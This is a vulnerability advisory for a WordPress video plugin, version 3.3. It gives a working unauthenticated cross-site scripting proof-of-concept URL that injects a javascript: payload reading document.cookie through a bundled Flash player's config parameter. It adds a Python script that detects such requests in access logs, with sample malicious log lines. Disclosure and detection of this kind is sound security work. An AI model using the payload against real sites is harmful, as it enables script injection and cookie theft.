wp-plugin : secure-html5-video-player

Plugin Details
Plugin Name: wp-plugin : secure-html5-video-player
Affected Version : 3.3 (and most probably lower versions, if any)
Vulnerability : Components with Known Vulnerabilities
Identified by : prajalkulkarni
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC (Proof of Concept) :

http://127.0.0.1/wordpress/wp-content/securehtml5videoplayer/flowplayer/flowplayer-3.2.7.swf?config={%22clip%22:{%22url%22:%22http://pseudo01.hddn.com/vod/demo.flowplayervod/flowplayer-700.flv%22,%20%22linkUrl%22:%22javascript:alert%28String.fromCharCode%2888,83,83%29%29;alert%28document.cookie%29%22},%22screen%22:{%22height%22:%22100pct%22,%22top%22:0},%22plugins%22:{%22controls%22:{%22timeColor%22:%22#ffffff%22,%22borderRadius%22:%220px%22,%22buttonOffColor%22:%22rgba%28130,130,130,1%29%22,%22bufferGradient%22:%22none%22,%22sliderColor%22:%22#000000%22,%22zIndex%22:1,%22backgroundColor%22:%22rgba%280,%200,%200,%200%29%22,%22scrubberHeightRatio%22:0.6,%22tooltipTextColor%22:%22#ffffff%22,%22volumeSliderGradient%22:%22none%22,%22spacing%22:{%22time%22:6,%22volume%22:8,%22all%22:2},%22sliderGradient%22:%22none%22,%22timeBorderRadius%22:20,%22timeBgHeightRatio%22:0.8,%22volumeSliderHeightRatio%22:0.6,%22progressGradient%22:%22none%22,%22height%22:26,%22volumeColor%22:%22#4599ff%22,%22tooltips%22:{%22marginBottom%22:5,%22buttons%22:false},%22timeSeparator%22:%22%20%22,%22name%22:%22controls%22,%22volumeBarHeightRatio%22:0.2,%22opacity%22:1,%22timeFontSize%22:12,%22left%22:%2250pct%22,%22tooltipColor%22:%22rgba%280,%200,%200,%200%29%22,%22bufferColor%22:%22#a3a3a3%22,%22volumeSliderColor%22:%22#ffffff%22,%22border%22:%220px%22,%22buttonColor%22:%22#ffffff%22,%22durationColor%22:%22#b8d9ff%22,%22autoHide%22:{%22enabled%22:true,%22hideDelay%22:500,%22hideStyle%22:%22fade%22,%22mouseOutDelay%22:500,%22hideDuration%22:400,%22fullscreenOnly%22:true},%22backgroundGradient%22:%22none%22,%22width%22:%22100pct%22,%22sliderBorder%22:%221px%20solid%20rgba%28128,%20128,%20128,%200.7%29%22,%22display%22:%22block%22,%22buttonOverColor%22:%22#ffffff%22,%22url%22:%22flowplayer.controls-3.2.5.swf%22,%22timeBorder%22:%220px%20solid%20rgba%280,%200,%200,%200.3%29%22,%22progressColor%22:%22#4599ff%22,%22timeBgColor%22:%22rgb%280,%200,%200,%200%29%22,%22scrubberBarHeightRatio%22:0.2,%22bottom%22:0,%22builtIn%22:false,%22volumeBorder%22:%221px%20solid%20rgba%28128,%20128,%20128,%200.7%29%22,%22margins%22:[2,12,2,12]}}}
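The PoC above works because the bundled flowplayer-3.2.7.swf accepts a URL-encoded JSON document in its `config` query parameter and the `clip.linkUrl` value inside it is used as a link target, so a `javascript:` scheme ends up executing in the origin of the WordPress site. Site operators who cannot remove the old SWF immediately usually want to know whether it has already been hit. The following Python script is an added detection example, not part of this advisory or of the plugin; it scans web server access log lines (the four sample lines are constructed here), decodes the `config` JSON of any request to a `.swf` file, and flags every string value that carries a `javascript:` scheme, including `\u`-escaped or oddly cased spellings that the JSON decoder normalises. The log format regex, the `.swf` path filter and the field names are assumptions for this example.

```python
"""Flag requests that pass a javascript: URL inside a Flash player's ``config`` JSON.

Added detection example for the advisory above; the sample log lines below are
constructed and the log layout (combined/common log format) is an assumption.
"""
import json
import re
from urllib.parse import parse_qs, urlsplit

# Request target inside a common-log-format line: "GET /path?query HTTP/1.1"
_REQ_RE = re.compile(r'"(?:GET|POST|HEAD)\s+(\S+)\s+HTTP/')
# A string whose scheme is javascript:, allowing leading whitespace (simplified
# normalisation; browsers strip more than \s before the scheme).
_JS_SCHEME_RE = re.compile(r'^\s*javascript\s*:', re.IGNORECASE)
# Looser check used only when the JSON cannot be parsed.
_JS_ANYWHERE_RE = re.compile(r'javascript\s*:', re.IGNORECASE)


def _iter_strings(node, path=""):
    """Yield (json_path, value) for every string inside a decoded JSON document."""
    stack = [(path, node)]
    while stack:
        cur_path, cur = stack.pop()
        if isinstance(cur, dict):
            for key, val in cur.items():
                stack.append((f"{cur_path}.{key}" if cur_path else key, val))
        elif isinstance(cur, list):
            for idx, val in enumerate(cur):
                stack.append((f"{cur_path}[{idx}]", val))
        elif isinstance(cur, str):
            yield cur_path, cur


def find_javascript_urls(config_json):
    """Return [(json_path, value)] for string values that use a javascript: scheme.

    Parsing the JSON first means escapes such as \\u006aavascript are decoded
    before the scheme check, so they are caught like the plain spelling.
    """
    try:
        doc = json.loads(config_json)
    except ValueError:
        # Truncated or deliberately malformed JSON: fall back to a raw scan so an
        # evasion attempt is still surfaced, with the whole blob as evidence.
        if _JS_ANYWHERE_RE.search(config_json):
            return [("<unparsed>", config_json)]
        return []
    return [(p, v) for p, v in _iter_strings(doc) if _JS_SCHEME_RE.match(v)]


def analyse_request(target):
    """Inspect one request target (path + query); return a finding dict or None."""
    parts = urlsplit(target)
    # Assumption: only Flash objects are of interest here; widen the filter if
    # other components of the site also take JSON via a query parameter.
    if not parts.path.lower().endswith(".swf"):
        return None
    query = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    hits = []
    for raw in query.get("config", []):
        hits.extend(find_javascript_urls(raw))
    if not hits:
        return None
    return {"path": parts.path, "hits": hits}


def scan_log(lines):
    """Run analyse_request over every log line; return findings with 1-based line numbers."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        match = _REQ_RE.search(line)
        if not match:
            continue
        finding = analyse_request(match.group(1))
        if finding:
            finding["line"] = lineno
            findings.append(finding)
    return findings


# Constructed sample access log (RFC 5737 documentation addresses, example.invalid host).
SAMPLE_LOG = [
    # benign player load: linkUrl is an ordinary http URL
    '203.0.113.5 - - [25/May/2014:10:01:02 +0000] "GET /wp-content/securehtml5videoplayer/flowplayer/flowplayer-3.2.7.swf?config=%7B%22clip%22%3A%7B%22url%22%3A%22http%3A%2F%2Fexample.invalid%2Fv.flv%22%2C%22linkUrl%22%3A%22http%3A%2F%2Fexample.invalid%2F%22%7D%7D HTTP/1.1" 200 512',
    # suspicious: linkUrl carries a javascript: URL, the pattern used by the PoC
    '198.51.100.7 - - [25/May/2014:10:02:15 +0000] "GET /wp-content/securehtml5videoplayer/flowplayer/flowplayer-3.2.7.swf?config=%7B%22clip%22%3A%7B%22url%22%3A%22http%3A%2F%2Fexample.invalid%2Fv.flv%22%2C%22linkUrl%22%3A%22javascript%3Aalert%281%29%22%7D%7D HTTP/1.1" 200 512',
    # unrelated request
    '192.0.2.9 - - [25/May/2014:10:03:00 +0000] "GET /wp-login.php HTTP/1.1" 200 2048',
    # truncated JSON with a mixed-case scheme: the raw fallback still flags it
    '198.51.100.7 - - [25/May/2014:10:04:41 +0000] "GET /wp-content/securehtml5videoplayer/flowplayer/flowplayer-3.2.7.swf?config=%7B%22clip%22%3A%7B%22linkUrl%22%3A%22JavaScript%3Aalert%281%29 HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['path']}")
        for json_path, value in f["hits"]:
            print(f"    {json_path} = {value[:60]!r}")
```

Run it against a real access log with `scan_log(open("access.log"))`; the `.swf` filter and the `config` parameter name are the two places to adjust for other bundled players. The decisive mitigation is still to upgrade the plugin past 3.3 (the fixed release the timeline below refers to) or to delete the old flowplayer SWF files from the plugin directory, since the scanner only tells you whether the file has been abused, not whether it is still reachable.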


Disclosure Timeline
Vendor Contacted : 2014-01-05
Plugin Status : Updated on 2014-01-11
Public Disclosure : May 25, 2014
CVE Number :
Plugin Description :
A video plugin for WordPress built on the VideoJS HTML5 video player library. Allows you to embed video in your post or page using HTML5 with Flash fallback support for non-HTML5 browsers. Settings can be easily configured with a control panel and simplified short codes. Video files can be served from a secured private directory or from an Amazon S3 compatible file storage service. Youtube or Vimeo video may be used as a fallback mechanism, or as primary videos, with HTML5 videos acting as fallbacks should the posted videos go away. See http://www.trillamar.com/webcraft/secure-html5-video-player/ for additional information about Secure HTML5 Video Player. See http://videojs.com/ for additional information about VideoJS.